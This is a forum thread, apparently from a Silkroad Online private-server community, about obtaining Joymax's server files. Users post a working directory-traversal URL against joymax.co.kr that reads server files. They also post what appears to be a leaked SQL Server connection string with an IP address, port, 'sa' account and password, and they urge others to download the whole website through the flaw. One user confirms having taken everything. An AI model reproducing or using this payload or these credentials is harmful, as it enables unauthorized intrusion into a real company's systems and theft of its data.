Joymax Server Files Leak

[RenePunik]

Closed#

[MeGaMaX]

first get exploit then easy to do it by hand or using a tool

[lemoniscool]

nice to see how all the "big guys" of the forum respond to a guy that has absolutely no clue of what he is talking about ..

[MeGaMaX]

nice to see how all the "big guys" of the forum respond to a guy that has absolutely no clue of what he is talking about ..

Doesn't mean how we are big guys that we dont answer the smaller guys (lower experience) we are not arrogant

Cheers ^^

[SigYee]

Doesn't mean how we are big guys that we dont answer the smaller guys (lower experience) we are not arrogant

Cheers ^^

You might not be, but Jangan ofc.



Anyway, Sector accept our skype requests (S******+P****7)

[RenePunik]

Closed#

[SnowStorm]

It's a bit annoying... They are skilled but it doesn't mean you can't do the same shit as them. It's just a matter of time, they spend more time on developing and hacking etc.. and you spend yours playing SRO. If you have the will and access to the internet then you can do almost everything you want.

[Molten]

Big guys? please, you make me laugh.

Here is one of many exploits in joymax.co.kr :

Code:

http://www.joymax.co.kr//fileDownloader.asp?fileName=2015%202Q%20%BD%C7%C0%FB%B9%DF%C7%A5.pdf&fileURL=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fsetupact.log

Open it using a notepad, not Adobe Reader. This exploit is incomplete and it requires some sort of a directory attack.

Good luck!

[POWEREDSHELL]

go to mama to learn you some English (happned) huh.

i said happend

i dont like "e" after "n"

atleast you understood what i said ;):

[AlephZero]

If you were serious about doing this you wouldn't be talking about it in public to begin with.

[ThuGie]

Here ya go.
ConnStr = GetConnStr("121.254.149.174,7610","joymax","sa","sjfqhaus%#@snsanf2gmffj(8)!")


Edit:
Wait lets make it even more easy..
http://www.joymax.co.kr//fileDownloa...de/connect.asp

Download the whole website!
begin with ..\default.asp build upon that.
Though it seems the sql server is closed for remote connections, or at least those that are not white-listed.

[AlephZero]

/\

Wow i can't believe that. Joymax must've hired chimps for programmers and even that would be an insult to chimps.

If you can find something related to darkeden, please let me know.

[Molten]

Here ya go.
ConnStr = GetConnStr("121.254.149.174,7610","joymax","sa","sjfqhaus%#@snsanf2gmffj(8)!")


Edit:
Wait lets make it even more easy..
http://www.joymax.co.kr//fileDownloa...de/connect.asp

Download the whole website!
begin with ..\default.asp build upon that.
Though it seems the sql server is closed for remote connections, or at least those that are not white-listed.

This database seems to be for the website use only. They have many games, and it wouldn't make sense to put Silkroad's database on the same host as their website.

[RenePunik]

Closed#

[AlephZero]

Got it all ^^